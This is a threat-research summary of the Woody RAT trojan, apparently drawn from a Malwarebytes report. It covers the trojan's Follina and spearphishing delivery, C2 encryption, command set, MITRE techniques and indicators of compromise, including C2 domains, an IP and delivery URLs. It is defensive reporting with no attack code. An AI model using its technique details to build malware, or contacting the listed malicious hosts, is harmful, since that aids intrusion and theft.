Threat Research

Woody RAT: A new feature-rich malware spotted in the wild

Securonix

Woody Rat is a new feature-rich Remote Access Trojan active in the wild for at least a year, attributed to a threat actor targeting Russian entities. It spreads via archive file spearphishing and weaponized Office documents using the Follina vulnerability (CVE-2022-30190), and it communicates with encrypted C2 servers and supports a broad command set. #WoodyRat #Follina #OAK #CVE-2022-30190

Keypoints

  • Woody Rat is a new, feature-rich Remote Access Trojan identified by Malwarebytes Threat Intelligence as active in the wild for at least one year.
  • Distribution methods include archive files (often disguised as Russian-labeled documents) and weaponized Office documents exploiting the Follina vulnerability.
  • The campaign targeted a Russian aerospace and defense entity known as OAK, inferred from a fake domain registration.
  • The malware uses a machine-specific cookie and RSA-4096/AES-CBC encryption to secure its C2 communications.
  • It supports a wide command set (e.g., PING, EXEC, UPLD, DNLD, SCRN, INJC, PSLS) and embeds two .NET DLLs (WoodySharpExecutor and WoodyPowerSession) for extended capabilities like PowerShell and .NET execution.
  • Cleanup employs Process Hollowing to delete itself from disk after establishing command threads.
  • Attribution remains uncertain; the actor is categorized as unknown, with potential links discussed but no solid indicators pointing to a specific group.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – Archive files are distributed via spear phishing emails to drop Woody Rat. “these archive files have been distributed using spear phishing emails.”
  • [T1203] Exploitation for Client Execution – Office documents weaponized with Follina CVE-2022-30190 drop Woody Rat. “The threat actor is using a Microsoft Office document… weaponized with the Follina (CVE-2022-30190) vulnerability to drop Woody Rat.”
  • [T1059.001] PowerShell – The malware uses PowerShell commands and scripts delivered from the C2 via WoodyPowerSession. “WoodyPowerSession … allows the malware to execute PowerShell commands and scripts received from the C2.”
  • [T1059.003] Windows Command Shell – EXEC command executes commands by creating two named pipes and redirecting I/O through them. “the malware creates two named pipes and redirects the input and output to these pipes.”
  • [T1055] Process Injection – INJC command involves injecting code into a target process via WriteProcessMemory and CreateRemoteThread. “writes it to the remote memory using WriteProcessMemory and then creates a remote thread using CreateRemoteThread.”
  • [T1055.012] Process Hollowing – Process Hollowing is used for malware cleanup by deleting itself via a suspended notepad process. “ProcessHollowing technique to do so.”
  • [T1113] Screen Capture – SCRN command takes a screenshot using Windows GDI+ and encrypts it before sending. “leverage Windows GDI+ to take the screenshot of the desktop. The image is then encrypted using AES-CBC and sent to the C2.”
  • [T1041] Exfiltration Over C2 Channel – Data is encrypted and transmitted to the C2 via HTTP requests. “data … AES-CBC encrypted” and the C2 endpoints handle submission and commands.
  • [T1012] Query Registry – The malware detects 6 AVs by querying Registry Keys. “The malware currently detects 6 AVs through Registry Keys; these AVs being Avast Software, Doctor Web, Kaspersky, AVG, ESET and Sophos.”
  • [T1083] File and Directory Discovery – The _DIR command lists directory contents and attributes. “This can list all the files and their attributes in a directory supplied as argument.”
  • [T1105] Ingress Tool Transfer – UPLD and DNLD commands are used to upload/download files between C2 and the infected host. “The Upload command is used to remotely upload a file to the infected machine” and “The DNLD command allows the C2 to retrieve any file from the infected machine.”

Indicators of Compromise

  • [File hash] Woody Rat file hashes – 982ec24b5599373b65d7fec3b7b66e6afff4872847791cf3c5688f47bfcb8bf0, 66378c18e9da070629a2dbbf39e5277e539e043b2b912cc3fed0209c48215d0b, and 2 more hashes
  • [Domain] C2 domains – kurmakata.duckdns[.]org, oakrussia[.]ru, and microsoft-telemetry[.]ru
  • [IP] C2 IP – 194.36.189.179
  • [Domain] Additional C2 domain – microsoft-ru-data[.]ru
  • [URL] Follina delivery URL – garmandesar.duckdns[.]org:444/uoqiuwef.html
  • [Filename] Follina document name – Памятка.docx
  • [Filename] Archive payload names – anketa_brozhik.doc.zip (contains Anketa_Brozhik.doc.exe), zayavka.zip (contains selection.doc.exe)
  • [URL] Woody Rat URL – fcloud.nciinform[.]ru/main.css (edited)

Read more: https://blog.malwarebytes.com/threat-intelligence/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild/